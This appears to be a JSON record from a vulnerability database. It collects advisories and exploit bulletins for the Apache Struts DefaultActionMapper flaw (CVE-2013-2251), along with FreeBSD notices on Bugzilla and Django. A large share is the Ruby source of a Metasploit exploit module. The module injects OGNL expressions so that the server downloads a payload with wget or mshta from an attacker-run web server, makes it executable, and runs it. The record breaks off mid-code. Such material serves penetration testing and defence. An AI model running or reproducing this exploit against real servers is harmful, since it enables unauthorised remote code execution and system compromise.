{"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2251"], "modified": "2013-08-01T00:00:00", "id": "SAINT:8B8924409E9AFE277FF0998CBA641AF8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_defaultactionmapper_redirect_prefix", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:59", "references": [], "description": "Added: 08/01/2013 \nCVE: [CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nBID: [61189](<http://www.securityfocus.com/bid/61189>) \nOSVDB: [95405](<http://www.osvdb.org/95405>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nThe `**DefaultActionMapper**` in Struts 2 versions prior to 2.3.15.1 does not properly handle parameters with a crafted `**redirect:**` prefix. This could allow remote attackers to execute arbitrary OGNL code. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.3.15.1 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-016.html> \n\n\n### Limitations\n\nThis exploit was tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2013-08-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "saint", "title": "Apache Struts DefaultActionMapper redirect Prefix Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2251"], "modified": "2013-08-01T00:00:00", "id": "SAINT:2FE5CCE51B64707F8D205A80240A6467", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/struts_defaultactionmapper_redirect_prefix", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:07", "references": [], "edition": 1, "description": "Added: 08/01/2013 \nCVE: [CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nBID: [61189](<http://www.securityfocus.com/bid/61189>) \nOSVDB: [95405](<http://www.osvdb.org/95405>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nThe `**DefaultActionMapper**` in Struts 2 versions prior to 2.3.15.1 does not properly handle parameters with a crafted `**redirect:**` prefix. This could allow remote attackers to execute arbitrary OGNL code. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.3.15.1 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-016.html> \n\n\n### Limitations\n\nThis exploit was tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "reporter": "SAINT Corporation", "published": "2013-08-01T00:00:00", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Apache Struts DefaultActionMapper redirect Prefix Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2251"], "modified": "2013-08-01T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_defaultactionmapper_redirect_prefix", "id": "SAINT:279F8312DEF0028C5D034325A810E73D", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:14:50", "references": ["https://bugzilla.mozilla.org/show_bug.cgi?id=713926"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "bugzilla40", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "bugzilla42", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "bugzilla44", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "bugzilla42", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.0.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "bugzilla44", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "bugzilla40", "operator": "lt"}], "description": "\nA Bugzilla Security Advisory reports:\n\nThe login form had no CSRF protection, meaning that\n\t an attacker could force the victim to log in using the\n\t attacker's credentials. If the victim then reports a new\n\t security sensitive bug, the attacker would get immediate\n\t access to this bug.\n\n\t Due to changes involved in the Bugzilla API, this fix is\n\t not backported to the 4.0 and 4.2 branches, meaning that\n\t Bugzilla 4.0.12 and older, and 4.2.8 and older, will\n\t remain vulnerable to this issue.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2014-04-17T00:00:00", "title": "bugzilla -- Cross-Site Request Forgery", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-1517"], "modified": "2014-04-18T00:00:00", "id": "608ED765-C700-11E3-848C-20CF30E32F6D", "href": "https://vuxml.freebsd.org/freebsd/608ed765-c700-11e3-848c-20cf30e32f6d.html", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T01:14:50", "references": ["https://www.djangoproject.com/weblog/2014/apr/21/security/"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py34-django", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.5.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py31-django15", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.5.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py32-django15", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.4.11", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py34-django14", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.4.11", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py26-django14", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.5.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py33-django15", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py33-django14", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py32-django", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py31-django", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py33-django", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py26-django", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.6.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py33-django", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py33-django15", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.4.11", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py33-django14", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py27-django15", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py32-django14", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.6.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py34-django", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py26-django15", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.6.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py32-django", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "20140423,1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py26-django-devel", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py26-django14", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.4.11", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py32-django14", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.4.11", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py27-django14", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.6.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py27-django", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py34-django14", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py34-django15", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py31-django14", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.5.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py27-django15", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py27-django14", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py27-django", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.4.11", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py31-django14", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "20140423,1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py27-django-devel", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py32-django15", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py31-django15", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.6.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py26-django", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.6.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py31-django", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.5.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py34-django15", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.5.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "py26-django15", "operator": "lt"}], "description": "\nThe Django project reports:\n\nThese releases address an unexpected code-execution issue, a\n\t caching issue which can expose CSRF tokens and a MySQL typecasting\n\t issue. While these issues present limited risk and may not affect\n\t all Django users, we encourage all users to evaluate their own\n\t risk and upgrade as soon as possible.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2014-04-21T00:00:00", "title": "django -- multiple vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0474", "CVE-2014-0473", "CVE-2014-0472"], "modified": "2014-04-30T00:00:00", "id": "59E72DB2-CAE6-11E3-8420-00E0814CAB4E", "href": "https://vuxml.freebsd.org/freebsd/59e72db2-cae6-11e3-8420-00e0814cab4e.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "dsquare": [{"lastseen": "2017-09-26T15:33:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.dsquare.DsquareBulletin"], "references": ["https://vulners.com/BID/BID:65709", "https://vulners.com/OSVDB/OSVDB:103578"], "description": "AdRotate contains a flaw that may allow carrying out an SQL injection attack.The issue is due to the library/clicktracker.php script not properly sanitizing user-supplied input to the 'track' parameter. This may allow a remote attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.\n\nVulnerability Type: SQL Injection", "reporter": "Dsquare Security", "published": "2014-03-04T00:00:00", "type": "dsquare", "title": "AdRotate library/clicktracker.php track Parameter SQL Injection", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1854"], "_object_type": "robots.models.dsquare.DsquareBulletin", "modified": "2014-01-23T00:00:00", "id": "E-361", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-26T15:33:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.dsquare.DsquareBulletin"], "references": ["https://vulners.com/BID/BID:61189", "https://vulners.com/BID/BID:64758", "https://vulners.com/NID/NID:68981", "https://vulners.com/OSVDB/OSVDB:95405"], "description": "Apache-Struts2 RCE\n\nVulnerability Type: Remote Command Execution", "reporter": "Dsquare Security", "published": "2013-10-20T00:00:00", "type": "dsquare", "title": "Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2251"], "_object_type": "robots.models.dsquare.DsquareBulletin", "modified": "2013-10-20T00:00:00", "id": "E-341", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisco": [{"lastseen": "2017-09-26T15:33:38", "_object_types": ["robots.models.base.Bulletin", "robots.models.cisco.CiscoBulletin"], "references": ["http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2"], "description": "A vulnerability in the DefaultActionMapper component could allow an unauthenticated, remote attacker to execute arbitrary commands on the targeted system.\n\nThe vulnerability is due to insufficient sanitization of user-supplied input. An attacker could exploit this vulnerability by sending crafted requests consisting of Object-Graph Navigation Language (OGNL) expressions. An exploit could allow the attacker to execute arbitrary code on the targeted system.\n\nMultiple Cisco products include an implementation of the Apache Struts 2 component that is affected by a remote command execution vulnerability. \n\nThe vulnerability is due to insufficient sanitization of user-supplied\ninput. An attacker could exploit this vulnerability by sending crafted requests\nconsisting of Object-Graph Navigation Language (OGNL) expressions to an affected system. An\nexploit could allow the attacker to execute arbitrary code on the targeted system. \n\nCisco has released software updates that address this vulnerability for all the affected products except Cisco Business Edition 3000. Cisco Business Edition 3000 customers should contact their Cisco representative for available options.\n\nWorkarounds that mitigate this vulnerability are not available.\nThis advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2\"]", "reporter": "Cisco", "published": "2013-10-23T16:00:00", "type": "cisco", "title": "Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Cisco Unified Contact Center Enterprise", "version": "any", "operator": "eq"}, {"name": "Cisco Identity Services Engine Software", "version": "any", "operator": "eq"}, {"name": "Cisco Business Edition 3000 Software", "version": "any", "operator": "eq"}, {"name": "Cisco Unified SIP Proxy", "version": "any", "operator": "eq"}, {"name": "Cisco MXE 3500 (Media Experience Engine)", "version": "any", "operator": "eq"}], "cvelist": ["CVE-2013-2251"], "_object_type": "robots.models.cisco.CiscoBulletin", "modified": "2015-10-12T12:30:06", "id": "CISCO-SA-20131023-STRUTS2", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2018-09-09T19:47:40", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or \"redirectAction:\" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.", "reporter": "Rapid7", "published": "2013-07-24T13:52:02", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/multi/http/struts_default_action_mapper.rb", "type": "metasploit", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2251"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Excellent", "id": "MSF:EXPLOIT/MULTI/HTTP/STRUTS_DEFAULT_ACTION_MAPPER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution',\n 'Description' => %q{\n The Struts 2 DefaultActionMapper supports a method for short-circuit navigation\n state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by\n a desired navigational target expression. This mechanism was intended to help with\n attaching navigational information to buttons within forms.\n\n In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or\n \"redirectAction:\" is not properly sanitized. Since said information will be\n evaluated as OGNL expression against the value stack, this introduces the\n possibility to inject server side code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Takeshi Terada', # Vulnerability discovery\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit modules\n ],\n 'References' =>\n [\n [ 'CVE', '2013-2251' ],\n [ 'OSVDB', '95405' ],\n [ 'BID', '61189' ],\n [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ]\n ],\n 'Platform' => %w{ linux win },\n 'Targets' =>\n [\n ['Automatic', {}],\n ['Windows',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'win'\n }\n ],\n ['Linux',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux'\n }\n ]\n ],\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 10\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DisclosureDate' => 'Jul 2 2013',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']),\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]),\n OptInt.new('PAYLOAD_REQUEST_DELAY', [true, 'Time to wait for the payload request', 5]),\n # It isn't OptPath becuase it's a *remote* path\n OptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ])\n ])\n end\n\n def on_new_session(session)\n if session.type == \"meterpreter\"\n session.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\n end\n\n @dropped_files.delete_if do |file|\n false unless file =~ /\\.exe/\n win_file = file.gsub(\"/\", \"\\\\\\\\\")\n if session.type == \"meterpreter\"\n begin\n wintemp = session.sys.config.getenv('TEMP')\n win_file = \"#{wintemp}\\\\#{win_file}\"\n session.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\n session.fs.file.rm(win_file)\n print_good(\"Deleted #{file}\")\n true\n rescue ::Rex::Post::Meterpreter::RequestError\n print_error(\"Failed to delete #{win_file}\")\n false\n end\n end\n end\n\n super\n end\n\n def start_http_service\n # do not use SSL for this part\n # XXX: See https://github.com/rapid7/metasploit-framework/issues/3853\n # It must be possible to do this without directly editing the\n # datastore.\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\n srv_host = Rex::Socket.source_address(rhost)\n else\n srv_host = datastore['SRVHOST']\n end\n\n service_url = srv_host + ':' + datastore['SRVPORT'].to_s\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\")\n start_service({\n 'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => '/'\n }\n })\n\n # Restore SSL preference\n # XXX: See https://github.com/rapid7/metasploit-framework/issues/3853\n # It must be possible to do this without directly editing the\n # datastore.\n datastore['SSL'] = true if ssl_restore\n\n return service_url\n end\n\n def check\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET'\n })\n\n if res.nil? or res.code != 200\n vprint_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\")\n return Exploit::CheckCode::Unknown\n end\n\n proof = rand_text_alpha(6 + rand(4))\n\n res = send_request_cgi({\n 'uri' => \"#{uri}?redirect:%24{new%20java.lang.String('#{proof}')}\",\n 'method' => 'GET'\n })\n\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ and res.headers['Location'] !~ /String/\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def auto_target\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET'\n })\n\n if res.nil? or res.code != 200\n fail_with(Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200\")\n end\n\n proof = rand_text_alpha(6 + rand(4))\n\n res = send_request_cgi({\n 'uri' => \"#{uri}?redirect:%24{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\",\n 'method' => 'GET'\n })\n\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\n if res.headers['Location'] =~ /:\\\\/\n return targets[1] # Windows\n else\n return targets[2] # Linux\n end\n end\n\n fail_with(Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\")\n\n end\n\n def exploit_linux\n\n downfile = rand_text_alpha(8+rand(8))\n @pl = @exe\n @pl_sent = false\n\n #\n # start HTTP service if necessary\n #\n service_url = start_http_service\n\n #\n # download payload\n #\n fname = datastore['WritableDir']\n fname = \"#{fname}/\" unless fname =~ %r'/$'\n fname << downfile\n uri = normalize_uri(target_uri.path)\n uri << \"?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\n\n print_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res.nil? or res.code != 302\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\n end\n\n #\n # wait for payload download\n #\n wait_payload\n\n register_file_for_cleanup(fname)\n\n #\n # chmod\n #\n uri = normalize_uri(target_uri.path)\n uri << \"?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\n\n print_status(\"#{rhost}:#{rport} - Make payload executable...\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res.nil? or res.code != 302\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\n end\n\n #\n # execute\n #\n uri = normalize_uri(target_uri.path)\n uri << \"?redirect:%24{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\"\n\n print_status(\"#{rhost}:#{rport} - Execute payload...\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res.nil? or res.code != 302\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\n end\n\n end\n\n def exploit_windows\n @var_exename = rand_text_alpha(4 + rand(4)) + '.exe'\n @pl = build_hta\n @pl_sent = false\n\n #\n # start HTTP service if necessary\n #\n service_url = start_http_service\n\n #\n # execute hta\n #\n uri = normalize_uri(target_uri.path)\n uri << \"?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\"\n\n print_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res.nil? or res.code != 302\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\n end\n\n #\n # wait for payload download\n #\n wait_payload\n\n register_file_for_cleanup(@var_exename)\n end\n\n def exploit\n if target.name =~ /Automatic/\n print_status(\"#{rhost}:#{rport} - Target autodetection...\")\n my_target = auto_target\n print_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\")\n else\n my_target = target\n end\n\n p = exploit_regenerate_payload(my_target.platform, my_target.arch)\n @exe = generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch})\n\n if my_target.name =~ /Linux/\n if datastore['PAYLOAD'] =~ /windows/\n fail_with(Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\")\n end\n exploit_linux\n elsif my_target.name =~ /Windows/\n if datastore['PAYLOAD'] =~ /linux/\n fail_with(Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\")\n end\n exploit_windows\n end\n end\n\n # Handle incoming requests from the server\n def on_request_uri(cli, request)\n vprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\")\n if (not @pl)\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\n return\n end\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\n @pl_sent = true\n send_response(cli, @pl)\n end\n\n def autofilter\n true\n end\n\n # wait for the data to be sent\n def wait_payload\n print_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\")\n\n waited = 0\n while (not @pl_sent)\n select(nil, nil, nil, 1)\n waited += 1\n if (waited > datastore['HTTP_DELAY'])\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\")\n end\n end\n\n sleep(datastore['PAYLOAD_REQUEST_DELAY'])\n end\n\n def build_hta\n var_shellobj\t\t= rand_text_alpha(rand(5)+5);\n var_fsobj\t\t = rand_text_alpha(rand(5)+5);\n var_fsobj_file\t\t= rand_text_alpha(rand(5)+5);\n var_vbsname\t\t = rand_text_alpha(rand(5)+5);\n var_writedir\t\t= rand_text_alpha(rand(5)+5);\n\n var_origLoc\t\t = rand_text_alpha(rand(5)+5);\n var_byteArray\t\t= rand_text_alpha(rand(5)+5);\n var_writestream\t\t= rand_text_alpha(rand(5)+5);\n var_strmConv\t\t= rand_text_alpha(rand(5)+5);\n\n # Doing in this way to bypass the ADODB.Stream restrictions on JS,\n # even when executing it as an \"HTA\" application\n # The encoding code has been stolen from ie_unsafe_scripting.rb\n print_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\");\n\n # Build the content that will end up in the .vbs file\n vbs_content\t= Rex::Text.to_hex(%Q|\nDim 